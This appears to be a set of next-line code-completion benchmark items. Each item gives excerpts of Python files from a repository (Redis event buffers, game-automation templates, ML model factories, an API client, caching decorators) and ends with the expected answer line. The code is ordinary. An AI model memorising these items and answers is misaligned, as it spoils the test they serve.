InvoiceMutations,
MenuMutations,
MetaMutations,
OrderMutations,
PageMutations,
PaymentMutations,
ProductMutations,
ShippingMutations,
ShopMutations,
StockMutations,
TaxMutations,
WarehouseMutations,
WebhookMutations,
):
def serialize_webhook_event(value):
# Path: saleor/webhook/observability/buffers.py
class RedisBuffer(BaseBuffer):
_pools: dict[str, ConnectionPool] = {}
_socket_connect_timeout = 0.25
_client_name = "observability_buffer"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._client: Optional[Redis] = None
def get_connection_pool(self):
return ConnectionPool.from_url(
self.broker_url,
socket_connect_timeout=self._socket_connect_timeout,
socket_timeout=self.connection_timeout,
client_name=self._client_name,
)
def get_or_create_connection_pool(self):
if self.broker_url not in self._pools:
self._pools[self.broker_url] = self.get_connection_pool()
return self._pools[self.broker_url]
def connect(self) -> Redis:
pool = self.get_or_create_connection_pool()
return Redis(connection_pool=pool)
@property
def client(self) -> Redis:
if not self._client:
self._client = self.connect()
return self._client
def _put_events(
self, key: KEY_TYPE, events: list[Any], client: Optional[Redis] = None
) -> int:
start_index = -self.max_size
events_data = [self.encode(event) for event in events[start_index:]]
if client is None:
client = self.client
client.lpush(key, *events_data)
client.ltrim(key, 0, max(0, self.max_size - 1))
client.expire(key, self.timeout)
return max(0, len(events) - self.max_size)
def put_events(self, events: list[Any]) -> int:
with self.client.pipeline(transaction=False) as pipe:
dropped = self._put_events(self.key, events, client=pipe)
result = pipe.execute()
return dropped + max(0, result[0] - self.max_size)
def put_event(self, event: Any) -> int:
return self.put_events([event])
def put_multi_key_events(
self, events_dict: dict[KEY_TYPE, list[Any]]
) -> dict[KEY_TYPE, int]:
keys = list(events_dict.keys())
trimmed: dict[KEY_TYPE, int] = {}
if not keys:
return trimmed
with self.client.pipeline(transaction=False) as pipe:
for key in keys:
trimmed[key] = self._put_events(key, events_dict[key], client=pipe)
result = pipe.execute()
for key in keys:
buffer_len, _, _ = result.pop(0), result.pop(0), result.pop(0)
trimmed[key] += max(0, buffer_len - self.max_size)
return trimmed
def _pop_events(self, key: KEY_TYPE, batch_size: int) -> tuple[list[Any], int]:
events = []
with self.client.pipeline(transaction=False) as pipe:
pipe.llen(key)
for _ in range(max(1, batch_size)):
pipe.rpop(key)
result = pipe.execute()
size = result.pop(0)
for elem in result:
if elem is None:
break
events.append(self.decode(elem))
return events, size - len(events)
def pop_event(self) -> Any:
events, _ = self._pop_events(self.key, batch_size=1)
return events[0] if events else None
def pop_events(self) -> list[Any]:
events, _ = self._pop_events(self.key, self.batch_size)
return events
def pop_events_get_size(self) -> tuple[list[Any], int]:
return self._pop_events(self.key, self.batch_size)
def clear(self) -> int:
with self.client.pipeline(transaction=False) as pipe:
pipe.llen(self.key)
pipe.delete(self.key)
result = pipe.execute()
return result[0]
def size(self) -> int:
return self.client.llen(self.key)
# Path: saleor/webhook/observability/utils.py
class GraphQLOperationResponse:
name: Optional[str] = None
query: Optional[GraphQLDocument] = None
variables: Optional[dict] = None
result: Optional[dict] = None
result_invalid: bool = False
# Path: saleor/webhook/observability/utils.py
def get_buffer_name() -> str:
return cache.make_key(BUFFER_KEY)
# Path: saleor/webhook/observability/tests/conftest.py
from typing import Optional
from unittest.mock import patch
from django.core.cache import cache
from graphql import get_default_backend
from redis import ConnectionPool
from ....graphql.api import schema
from ..buffers import RedisBuffer
from ..utils import GraphQLOperationResponse, get_buffer_name
import fakeredis
import pytest
backend = get_default_backend()
BROKER_URL_HOST = "fake-redis"
BROKER_URL = f"redis://{BROKER_URL_HOST}"
KEY, MAX_SIZE, BATCH_SIZE = get_buffer_name(), 10, 5
@pytest.fixture
def gql_operation_factory():
def factory(
query_string: str,
operation_name: Optional[str] = None,
variables: Optional[dict] = None,
result: Optional[dict] = None,
result_invalid=False,
) -> GraphQLOperationResponse:
| query = backend.document_from_string(schema, query_string) |
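RedisBuffer._put_events above keeps each key as a capped list: lpush the newest entries, ltrim to max_size, refresh the expiry. A standalone sketch of the same idiom with redis-py; the connection details are placeholders:
import redis

r = redis.Redis(host="localhost", port=6379)  # placeholder connection

def push_capped(key: str, value: bytes, max_size: int = 10, ttl: int = 3600) -> None:
    # Newest item goes on the left; trimming the right enforces the cap.
    pipe = r.pipeline(transaction=False)
    pipe.lpush(key, value)
    pipe.ltrim(key, 0, max_size - 1)
    pipe.expire(key, ttl)
    pipe.execute()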
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Aues6uen11Z/Zafkiel
# Path: zafkiel/device/template.py
class ImageTemplate(Template):
def __init__(
self,
filename: str,
record_pos: tuple = None,
keyword: Keyword = None,
threshold: float = None,
target_pos: int = TargetPos.MID,
resolution: tuple = (1280, 720),
rgb: bool = False,
scale_max: int = 800,
scale_step: float = 0.005,
template_path: str = 'templates'
):
super().__init__(filename, threshold, target_pos, record_pos, resolution, rgb, scale_max, scale_step)
self.template_path = template_path # under root path
self.keyword = keyword
if self.keyword is not None and self.keyword.name == '':
"""
Please note that due to the __post_init__ method of the Keyword class running before this 'name' assignment,
its 'instances' dictionary will get a dictionary item with an empty string key.
This means that each instance of the Keyword class that omits the 'name' parameter will be constantly
overwritten. If you want to use Keyword().instances for special purposes, you must initialize 'name'.
"""
self.keyword.name = self.name
@cached_property
def filepath(self) -> str:
if self._filepath:
return self._filepath
for dir_name in G.BASEDIR:
filepath = os.path.join(dir_name, self.template_path, self.filename)
if os.path.isfile(filepath):
self._filepath = filepath
return self._filepath
return self.filename
@cached_property
def name(self) -> str:
return Path(self.filename).stem
@cached_property
def image(self) -> ndarray:
return self._imread()
@cached_property
def height(self) -> int:
return self.image.shape[0]
@cached_property
def width(self) -> int:
return self.image.shape[1]
def _has_border(self) -> bool:
"""
If the game is running in a bordered process, coordinates need to be corrected.
Returns:
Whether the game is running in a bordered process.
"""
actual_ratio = G.DEVICE.get_current_resolution()[0] / G.DEVICE.get_current_resolution()[1]
template_ratio = self.resolution[0] / self.resolution[1]
return actual_ratio != template_ratio
def ratio(self, screen_height: float = None) -> float:
"""
Calculate the ratio of the current screen to the template image.
"""
if screen_height is None:
if self._has_border():
border = Config.BORDER[0] + Config.BORDER[2]
else:
border = 0
screen_height = G.DEVICE.get_current_resolution()[1] - border
return screen_height / self.resolution[1]
@cached_property
def area(self) -> tuple:
"""
Calculate the area of the template image on the current screen.
Returns:
Upper left and lower right corner coordinate.
"""
screen_resolution = G.DEVICE.get_current_resolution()
if self._has_border():
border = Config.BORDER
else:
border = (0, 0, 0)
screen_width = screen_resolution[0] - border[1] * 2
screen_height = screen_resolution[1] - border[0] - border[2]
ratio = self.ratio(screen_height)
x1 = screen_width / 2 + self.record_pos[0] * screen_width - self.width / 2 * ratio + border[1]
y1 = screen_height / 2 + self.record_pos[1] * screen_width - self.height / 2 * ratio + border[0]
x2 = screen_width / 2 + self.record_pos[0] * screen_width + self.width / 2 * ratio + border[1]
y2 = screen_height / 2 + self.record_pos[1] * screen_width + self.height / 2 * ratio + border[0]
return x1, y1, x2, y2
# Path: zafkiel/exception.py
class ScriptError(Exception):
pass
# Path: zafkiel/ui/switch.py
from zafkiel.device.template import ImageTemplate as Template
from zafkiel.exception import ScriptError
class Switch:
"""
A wrapper to handle in-game switches, switching among states with retries.
Main code comes from https://github.com/LmeSzinc/StarRailCopilot/blob/master/module/ui/switch.py
Examples:
# Definitions
submarine_hunt = Switch('Submarine_hunt', offset=120)
submarine_hunt.add_state('on', check_button=Template(r"assets/ON.png"))
submarine_hunt.add_state('off', check_button=Template(r"assets/OFF.png"))
# Change state to ON
submarine_hunt.set(TPL_ON)
"""
def __init__(self, name: str = 'Switch', is_selector: bool = False):
"""
Args:
name:
is_selector: True if this is a multi choice, click to choose one of the switches.
For example: | [Daily] | Urgent | -> click -> | Daily | [Urgent] |
False if this is a switch, click the switch itself, and it changed in the same position.
For example: | [ON] | -> click -> | [OFF] |
"""
self.name = name
self.is_choice = is_selector
self.state_list = []
def __str__(self):
return self.name
__repr__ = __str__
def add_state(self, state: str, check_button: Template, click_button: Template = None):
"""
Args:
state: Must match check_button.name
check_button:
click_button:
"""
self.state_list.append({
'state': state,
'check_button': check_button,
'click_button': click_button if click_button is not None else check_button,
})
def get_data(self, state: Template) -> dict:
"""
Args:
state:
Returns:
Dictionary in add_state
Raises:
ScriptError: If state invalid
"""
for row in self.state_list:
if row['state'] == state.name:
return row
| raise ScriptError(f'Switch {self.name} received an invalid state {state}') |
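To make the scaling in ImageTemplate.ratio() and area() above concrete, here is the same arithmetic with made-up numbers (a 720p template on a borderless 1080p screen); every value is illustrative:
template_h, screen_w, screen_h = 720, 1920, 1080
ratio = screen_h / template_h          # 1.5: one template pixel covers 1.5 screen pixels
record_pos = (0.1, -0.05)              # offset from screen centre, in units of screen width
tpl_w, tpl_h = 100, 40                 # template image size in template pixels
x1 = screen_w / 2 + record_pos[0] * screen_w - tpl_w / 2 * ratio
y1 = screen_h / 2 + record_pos[1] * screen_w - tpl_h / 2 * ratio
print(ratio, (x1, y1))                 # 1.5 (1077.0, 414.0)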
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: medkit-lib/medkit
# Path: medkit/training/utils.py
class BatchData(dict):
"""A BatchData pack data allowing both column and row access"""
def __getitem__(self, index: int) -> Dict[str, Union[List[Any], torch.Tensor]]:
if isinstance(index, str):
inner_dict = dict(self.items())
return inner_dict[index]
return {key: values[index] for key, values in self.items()}
def to_device(self, device: torch.device) -> BatchData:
"""
Ensure that Tensors in the BatchData object are on the specified `device`
Parameters
----------
device:
A `torch.device` object representing the device on which tensors
will be allocated.
Returns
-------
BatchData
A new object with the tensors on the proper device.
"""
inner_batch = BatchData()
for key, value in self.items():
if isinstance(value, torch.Tensor):
inner_batch[key] = value.to(device)
else:
inner_batch[key] = value
return inner_batch
# Path: tests/unit/training/dummy_context_component/dummy_model.py
class DummyTextCat(nn.Module):
"""Construct a dummy model for text classification using a embedding bag architecture"""
def __init__(self, config: DummyTextCatConfig):
super().__init__()
self.model_name = "TextCat"
self.config = config
self.loss = torch.nn.CrossEntropyLoss()
self.embedding = nn.EmbeddingBag(self.config.vocab_size, self.config.embed_dim, sparse=True)
self.fc = nn.Linear(self.config.embed_dim, self.config.num_class)
self.init_weights()
def init_weights(self):
initrange = 0.5
self.embedding.weight.data.uniform_(-initrange, initrange)
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc.bias.data.zero_()
def forward(self, inputs_ids: torch.FloatTensor, offsets: torch.FloatTensor) -> BatchData:
embedded = self.embedding(inputs_ids, offsets)
logits = self.fc(embedded)
return logits
def compute_loss(self, logits: torch.FloatTensor, labels: torch.FloatTensor):
return self.loss(logits, labels)
# Path: tests/unit/training/dummy_context_component/dummy_model.py
class DummyTextCatConfig:
vocab_size: int = 512
embed_dim: int = 16
num_class: int = 2
# Path: tests/unit/training/dummy_context_component/dummy_model.py
class DummyTokenizer:
def __call__(self, text: str) -> List[int]:
return [ord(char) for char in text]
# Path: tests/unit/training/dummy_context_component/dummy_component.py
import os
import torch
from typing import Optional
from medkit.training import BatchData
from .dummy_model import DummyTextCat, DummyTextCatConfig, DummyTokenizer
PYTORCH_MODEL_NAME = "pytorch_model.bin"
class MockTrainableComponent:
def __init__(
self,
model_path: Optional[str] = None,
output_label: str = "category",
device="cpu",
):
self.tokenizer = DummyTokenizer()
# load architecture
| self.model = DummyTextCat(config=DummyTextCatConfig()) |
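The DummyTextCat above relies on nn.EmbeddingBag, which takes one flat tensor of token ids plus an offsets tensor marking where each text begins. A small sketch of preparing that input, using the same ord()-based scheme as DummyTokenizer; the texts are invented:
import torch

texts = ["hi", "medkit"]
ids = [[ord(c) for c in t] for t in texts]        # all ASCII ids fit vocab_size=512
flat = torch.tensor([i for seq in ids for i in seq], dtype=torch.long)
offsets = torch.tensor([0, len(ids[0])], dtype=torch.long)
bag = torch.nn.EmbeddingBag(512, 16)              # vocab_size=512, embed_dim=16 as in the config
print(bag(flat, offsets).shape)                   # torch.Size([2, 16])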
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: donahowe/VE-MLD
# Path: src_files/ml_decoder/ml_decoder.py
def add_ml_decoder_head(model, num_classes=-1, num_of_groups=-1, decoder_embedding=768, zsl=0):
if num_classes == -1:
num_classes = model.num_classes
num_features = model.num_features
if hasattr(model, 'global_pool') and hasattr(model, 'fc'): # resnet50
model.global_pool = nn.Identity()
del model.fc
model.fc = MLDecoder(num_classes=num_classes, initial_num_features=num_features, num_of_groups=num_of_groups,
decoder_embedding=decoder_embedding, zsl=zsl)
elif hasattr(model, 'head'): # tresnet
if hasattr(model, 'global_pool'):
model.global_pool = nn.Identity()
del model.head
model.head = MLDecoder(num_classes=num_classes, initial_num_features=num_features, num_of_groups=num_of_groups,
decoder_embedding=decoder_embedding, zsl=zsl)
else:
print("model is not suited for ml-decoder")
exit(-1)
return model
# Path: src_files/models/tresnet/tresnet.py
def TResnetM(model_params):
"""Constructs a medium TResnet model.
"""
in_chans = 3
num_classes = model_params['num_classes']
model = TResNet(layers=[3, 4, 11, 3], num_classes=num_classes, in_chans=in_chans)
return model
# Path: src_files/models/tresnet/tresnet.py
def TResnetL(model_params):
"""Constructs a large TResnet model.
"""
in_chans = 3
num_classes = model_params['num_classes']
layers_list = [3, 4, 23, 3]
model = TResNet(layers=layers_list, num_classes=num_classes, in_chans=in_chans, first_two_layers=Bottleneck)
return model
# Path: src_files/models/tresnet/tresnet.py
def TResnetXL(model_params):
"""Constructs a large TResnet model.
"""
in_chans = 3
num_classes = model_params['num_classes']
layers_list = [3, 8, 34, 5]
model = TResNet(layers=layers_list, num_classes=num_classes, in_chans=in_chans, first_two_layers=Bottleneck)
return model
# Path: src_files/models/vit.py
def VE(model_params):
in_chans = 3
num_classes = model_params['num_classes']
imagesize = model_params['image_size']
patchsize = 32
model = ViT(num_classes=num_classes, channels=in_chans, image_size=imagesize ,patch_size=patchsize)
return model
# Path: src_files/models/utils/factory.py
import logging
import os
import torch
from urllib import request
from ...ml_decoder.ml_decoder import add_ml_decoder_head
from ..tresnet import TResnetM, TResnetL, TResnetXL
from ..vit import VE
logger = logging.getLogger(__name__)
def create_model(args,load_head=False):
"""Create a model
"""
model_params = {'args': args, 'num_classes': args.num_classes, 'image_size': args.image_size}
args = model_params['args']
args.model_name = args.model_name.lower()
if args.model_name == 'vit':
model = VE(model_params)
elif args.model_name == 'tresnet_m':
model = TResnetM(model_params)
elif args.model_name == 'tresnet_l':
| model = TResnetL(model_params) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: WindowsSov8forUs/bestdori_api
# Path: bestdori/exceptions.py
class AssetsNotExistError(AssetsException):
'''Raised when an asset does not exist'''
# Initialization
def __init__(self, asset_name: str) -> None:
msg = f'The asset {asset_name} may not exist.'
super().__init__(msg)
# Path: bestdori/exceptions.py
class RequestException(BaseException):
'''Raised when sending a request fails'''
# Initialization
def __init__(self, api: str, msg: str='No error code available.', **kwargs: Any) -> None:
if len(kwargs) > 0:
msg += f': {kwargs}'
else:
msg += '.'
super().__init__(msg)
self.api = api
'''The API used for the request'''
# String representation
def __str__(self) -> str:
'''Return the string representation'''
return f'Error while sending a request to Bestdori {self.api}. {self.message}'
# Path: bestdori/exceptions.py
REQUEST_EXCEPTION: dict[str, type[RequestException]] = {
'REQUEST_INVALID': RequestInvalidError,
'LOGIN_REQUIRED': LoginRequiredError,
'CREDENTIALS_INVALID': CredentialsInvalidError,
'USER_INVALID': UserInvalidError,
'ALREADY_UPLOADED': AlreadyUploadedError,
'POST_INVALID': PostInvalidError
}
# Path: bestdori/utils/network.py
from json import dumps
from io import BufferedReader
from httpx._models import Cookies
from httpx import Response, Request, Client
from typing import Optional, Literal, cast, Any
from ..exceptions import (
AssetsNotExistError,
RequestException,
REQUEST_EXCEPTION
)
'''`bestdori.utils.network`
Module for sending requests to Bestdori'''
# Class for sending API requests to Bestdori
class Api:
'''Class for sending API requests to Bestdori
Parameters:
api (str): The API address to request
proxy (Optional[str]): Proxy server'''
api: str
'''The API address to request'''
proxy: Optional[str]=None
'''Proxy server'''
headers: dict[str, str]
'''Request headers'''
# Initialization
def __init__(
self,
api: str,
proxy: Optional[str]=None
) -> None:
'''Initialize'''
self.api = api
self.proxy = proxy
self.headers = {'Content-Type': 'application/json;charset=UTF-8'}
return
# Send the request
def request(
self,
method: Literal['get', 'post'],
*,
cookies: Optional[Cookies]=None,
params: Optional[dict[str, Any]]=None,
data: Optional[dict[str, Any]]=None,
files: Optional[dict[str, tuple[str, BufferedReader]]]=None
) -> Response:
'''Send the request
Parameters:
method (Literal['get', 'post']): API method to use
cookies (Optional[Cookies], optional): Cookies
params (Optional[dict[str, Any]], optional): Call parameters
data (Optional[dict[str, Any]], optional): Call parameters, sent as a `json` string
files (Optional[dict[str, tuple[str, BufferedReader]]], optional): File parameters to send
Returns:
Response: The received response
'''
# Normalize the received API address
if not (self.api.startswith('http://') or self.api.startswith('https://')):
self.api = 'https://bestdori.com/api/' + self.api
# Build the request
request = Request(
method,
self.api,
cookies=cookies,
params=params,
data=cast(dict, dumps(data)) if data is not None else data,
files=files,
headers=self.headers if not self.api.endswith('/upload') else None
)
# Build the proxy server dictionary
if self.proxy is not None:
proxies = {'http://': self.proxy, 'https://': self.proxy}
else:
proxies = None
# Send the request and get the response
with Client(proxies=cast(dict, proxies)) as client:
response = client.send(request)
client.close()
# Process the received response
response.raise_for_status()
# Check whether the received response is in json format
content_type = response.headers.get('content-type', None)
if content_type is None:
# Guard first: an `in` check against a missing header would raise a TypeError
raise Exception('The received response has no content-type.')
if 'application/json' not in content_type:
return response
if isinstance((response_data := response.json()), dict):
if (result := response_data.get('result', None)) is not None:
if result is False:
if (code := response_data.get('code', None)) is not None:
if code in REQUEST_EXCEPTION: # if the error code is known
exception_class = REQUEST_EXCEPTION[code]
if params is not None:
raise exception_class(self.api, **params)
elif data is not None:
raise exception_class(self.api, **data)
else:
raise exception_class(self.api)
else:
| raise RequestException(self.api, code) |
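The request() method above dispatches server error codes through the REQUEST_EXCEPTION table. A stripped-down sketch of that lookup-and-raise pattern; the class name and code string here are invented for illustration:
class LoginRequiredError(Exception):
    pass

ERROR_TABLE = {'LOGIN_REQUIRED': LoginRequiredError}

def raise_for_code(api: str, code: str) -> None:
    exc_class = ERROR_TABLE.get(code)
    if exc_class is not None:
        raise exc_class(api)                           # known code: specific exception
    raise Exception(f'{api} returned error code {code}')  # unknown code: generic fallback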
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: jidiai/Competition_OvercookedAI-2
# Path: env/chooseenv.py
def make(env_type, seed=None, conf=None):
file_path = os.path.join(os.path.dirname(__file__), 'config.json')
if not conf:
with open(file_path) as f:
conf = json.load(f)[env_type]
class_literal = conf['class_literal']
if env_type.split('-')[0] in ["olympics"]:
return getattr(env, class_literal)(conf, seed)
else:
return getattr(env, class_literal)(conf)
# Path: utils/get_logger.py
def get_logger(log_path, name, save_file=False, console_out=False, json_file=False):
if not os.path.exists(log_path):
os.mkdir(log_path)
logger = logging.getLogger(name='Jidi')
logger.setLevel(logging.INFO)
# Create one log file per minute
rq = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))
log_name = log_path + rq + '_' + name+ '.log'
json_log_name = log_path + rq + '_' + name + '.json'
logfile = log_name
if save_file:
fh = logging.FileHandler(logfile, mode='a')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
# Output to the console
if console_out:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logger.addHandler(console)
# Output to json
if json_file:
fh_json = logging.FileHandler(json_log_name, mode='a')
fh_json.setLevel(logging.DEBUG)
formatter_json = logging.Formatter("%(message)s")
fh_json.setFormatter(formatter_json)
logger.addHandler(fh_json)
return logger
# Path: env/obs_interfaces/observation.py
class GridObservation(object):
class VectorObservation(object):
class DictObservation(object):
class CustomObservation(object):
def get_grid_observation(self, current_state, player_id, info_before):
def get_grid_many_observation(self, current_state, player_id_list, info_before=''):
def get_vector_observation(self, current_state, player_id, info_before):
def get_vector_many_observation(self, current_state, player_id_list, info_before=''):
def get_dict_observation(self, current_state, player_id, info_before):
def get_dict_many_observation(self, current_state, player_id_list, info_before=''):
def get_custom_observation(self, current_state, player_id):
def get_custom_obs_space(self, player_id):
def get_custom_many_observation(self, current_state, player_id_list):
def get_custom_many_obs_space(self, player_id_list):
# Path: run_log.py
import os
import time
import json
import numpy as np
import argparse
import sys
from env.chooseenv import make
from utils.get_logger import get_logger
from env.obs_interfaces.observation import obs_type
# -*- coding:utf-8 -*-
sys.path.append("./olympics_engine")
class NpEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def get_players_and_action_space_list(g):
if sum(g.agent_nums) != g.n_player:
raise Exception("agent number = %d 不正确,与n_player = %d 不匹配" % (sum(g.agent_nums), g.n_player))
n_agent_num = list(g.agent_nums)
for i in range(1, len(n_agent_num)):
n_agent_num[i] += n_agent_num[i - 1]
# Assign player ids according to agent number
players_id = []
actions_space = []
for policy_i in range(len(g.obs_type)):
if policy_i == 0:
players_id_list = range(n_agent_num[policy_i])
else:
players_id_list = range(n_agent_num[policy_i - 1], n_agent_num[policy_i])
players_id.append(players_id_list)
action_space_list = [g.get_single_action_space(player_id) for player_id in players_id_list]
actions_space.append(action_space_list)
return players_id, actions_space
def get_joint_action_eval(game, multi_part_agent_ids, policy_list, actions_spaces, all_observes):
if len(policy_list) != len(game.agent_nums):
error = "模型个数%d与玩家个数%d维度不正确!" % (len(policy_list), len(game.agent_nums))
raise Exception(error)
# [[[0, 0, 0, 1]], [[0, 1, 0, 0]]]
joint_action = []
for policy_i in range(len(policy_list)):
if game.obs_type[policy_i] not in obs_type:
raise Exception("可选obs类型:%s" % str(obs_type))
agents_id_list = multi_part_agent_ids[policy_i]
action_space_list = actions_spaces[policy_i]
function_name = 'm%d' % policy_i
for i in range(len(agents_id_list)):
agent_id = agents_id_list[i]
a_obs = all_observes[agent_id]
each = eval(function_name)(a_obs, action_space_list[i], game.is_act_continuous)
joint_action.append(each)
# print(joint_action)
return joint_action
def set_seed(g, env_name):
if env_name.split("-")[0] in ['magent']:
g.reset()
seed = g.create_seed()
g.set_seed(seed)
def run_game(g, env_name, multi_part_agent_ids, actions_spaces, policy_list, render_mode):
"""
This function is used to generate log for Vue rendering. Saves .json file
"""
log_path = os.getcwd() + '/logs/'
if not os.path.exists(log_path):
os.mkdir(log_path)
| logger = get_logger(log_path, g.game_name, json_file=render_mode) |
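The NpEncoder above exists because json.dumps cannot serialise numpy scalars or arrays by itself; it is wired in through the cls argument. A usage sketch, assuming NpEncoder from this file is in scope and with invented payload values:
import json
import numpy as np

payload = {"reward": np.float32(1.5), "obs": np.arange(3)}
print(json.dumps(payload, cls=NpEncoder))  # {"reward": 1.5, "obs": [0, 1, 2]}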
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AnonymGiant/ViLaM
# Path: lavis/common/registry.py
class Registry:
def register_builder(cls, name):
def wrap(builder_cls):
def register_task(cls, name):
def wrap(task_cls):
def register_model(cls, name):
def wrap(model_cls):
def register_processor(cls, name):
def wrap(processor_cls):
def register_lr_scheduler(cls, name):
def wrap(lr_sched_cls):
def register_runner(cls, name):
def wrap(runner_cls):
def register_path(cls, name, path):
def register(cls, name, obj):
def get_builder_class(cls, name):
def get_model_class(cls, name):
def get_task_class(cls, name):
def get_processor_class(cls, name):
def get_lr_scheduler_class(cls, name):
def get_runner_class(cls, name):
def list_runners(cls):
def list_models(cls):
def list_tasks(cls):
def list_processors(cls):
def list_lr_schedulers(cls):
def list_datasets(cls):
def get_path(cls, name):
def get(cls, name, default=None, no_warning=False):
def unregister(cls, name):
# Path: lavis/processors/base_processor.py
class BaseProcessor:
def __init__(self):
self.transform = lambda x: x
return
def __call__(self, item):
return self.transform(item)
@classmethod
def from_config(cls, cfg=None):
return cls()
def build(self, **kwargs):
cfg = OmegaConf.create(kwargs)
return self.from_config(cfg)
# Path: lavis/processors/randaugment.py
class RandomAugment(object):
def __init__(self, N=2, M=10, isPIL=False, augs=[]):
self.N = N
self.M = M
self.isPIL = isPIL
if augs:
self.augs = augs
else:
self.augs = list(arg_dict.keys())
def get_random_ops(self):
sampled_ops = np.random.choice(self.augs, self.N)
return [(op, 0.5, self.M) for op in sampled_ops]
def __call__(self, img):
if self.isPIL:
img = np.array(img)
ops = self.get_random_ops()
for name, prob, level in ops:
if np.random.random() > prob:
continue
args = arg_dict[name](level)
img = func_dict[name](img, *args)
return img
# Path: lavis/processors/blip_processors.py
import re
from lavis.common.registry import registry
from lavis.processors.base_processor import BaseProcessor
from lavis.processors.randaugment import RandomAugment
from omegaconf import OmegaConf
from torchvision import transforms
from torchvision.transforms.functional import InterpolationMode
"""
Copyright (c) 2022, salesforce.com, inc.
All rights reserved.
SPDX-License-Identifier: BSD-3-Clause
For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
"""
class BlipImageBaseProcessor(BaseProcessor):
def __init__(self, mean=None, std=None):
if mean is None:
mean = (0.48145466, 0.4578275, 0.40821073)
if std is None:
std = (0.26862954, 0.26130258, 0.27577711)
self.normalize = transforms.Normalize(mean, std)
| @registry.register_processor("blip_caption") |
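BlipImageBaseProcessor above only fixes the Normalize step; subclasses typically compose it with resizing and tensor conversion. A hedged sketch of such a pipeline; the 224x224 size is an illustrative choice, not taken from this file:
from torchvision import transforms
from torchvision.transforms.functional import InterpolationMode

mean = (0.48145466, 0.4578275, 0.40821073)  # defaults from the class above
std = (0.26862954, 0.26130258, 0.27577711)
pipeline = transforms.Compose([
    transforms.Resize((224, 224), interpolation=InterpolationMode.BICUBIC),
    transforms.ToTensor(),
    transforms.Normalize(mean, std),
])
# pipeline(pil_image) -> normalized float tensor of shape (3, 224, 224)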
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: MorrisNein/pecapiku
# Path: pecapiku/base_cache.py
class omnimethod(Generic[DecoratedCallable]):
class BaseCache(ABC):
def __init__(self, func: DecoratedCallable):
def __get__(self, instance, owner) -> DecoratedCallable:
def __init__(self, file_path: os.PathLike | str | None = None, access: CacheAccess = 'rew'):
def _get_cache_val(self, key: Hashable) -> Any:
def _put_cache_val(self, key: Hashable, value: Any):
def _key_func(self, *args, **kwargs) -> Hashable:
def _read_execute_write(self, func, func_args, func_kwargs, access, key_kwargs: dict | None = None) -> Any:
def _decorate(cls, func: DecoratedCallable, *args, **kwargs) -> Decorator | DecoratedCallable:
def _get_default_file_path(cls):
def decorate(self: BaseCache | Type[BaseCache],
func: DecoratedCallable,
*,
file_path: os.PathLike | str | None = None,
access: CacheAccess | None = None, **kwargs) -> Decorator | DecoratedCallable:
# Path: pecapiku/cache_access.py
COMP_CACHE_FILE_NAME = '_comp_cache.pkl'
def _resolve_filepath(file_path: os.PathLike | str) -> Path:
def _initialize_cache(file_path: os.PathLike) -> NoCache | Any:
def update_cache(cache: Any, file_path: Path):
# Path: pecapiku/no_cache.py
class NoCache:
def __bool__(self):
return False
def __eq__(self, other) -> bool:
return isinstance(other, NoCache)
def __repr__(self):
return '<NoCache object>'
# Path: pecapiku/single_value_cache.py
from __future__ import annotations
import os
from functools import partial, wraps
from typing import Any, Generic, Hashable
from pecapiku.base_cache import BaseCache, DecoratedCallable, Decorator, omnimethod
from pecapiku.cache_access import CacheAccess, _initialize_cache, _resolve_filepath, update_cache
from pecapiku.no_cache import NoCache
class SingleValueCache(BaseCache, Generic[DecoratedCallable]):
""" Decorator for caching of evaluation results.
Creates a "pickle" file at disk space on a specified path.
Wraps a function and stores its execution result in the file.
To apply, use the method ``SingleValueCache.decorate()`` or ``SingleValueCache(...)()``.
Args:
file_path - a path to an existing or non-existent pickle file.
If a relative path or a filename is given, puts it into the framework cache directory.
access - cache access indicators. The string may include the following indicators:
- ``r`` - read - grants access to read the cache file content
- ``e`` - execute/evaluate - grants access to evaluate the decorated function (if such is present)
- ``w`` - write - grants access to modify the cache file content
Example
-------
>>> import time
>>> from timeit import timeit
>>> def a_heavy_function():
... time.sleep(1)
>>> @SingleValueCache('a_heavy_function.pkl') # or @SingleValueCache.decorate(file_path='a_heavy_function.pkl')
... def a_heavy_function_cached():
... time.sleep(1)
>>> print(timeit(a_heavy_function, number=10)) # 10.070
>>> print(timeit(a_heavy_function_cached, number=10)) # 1.015
"""
@classmethod
def _get_default_file_path(cls) -> None:
return None
def __init__(self, file_path: os.PathLike | str | None = None, access: CacheAccess = 'rew'):
super().__init__(file_path, access)
self.cache_dict = None
def __call__(self,
func: DecoratedCallable | None = None, *, file_path: os.PathLike | str | None = None,
| access: CacheAccess | None = None) -> DecoratedCallable | Decorator: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
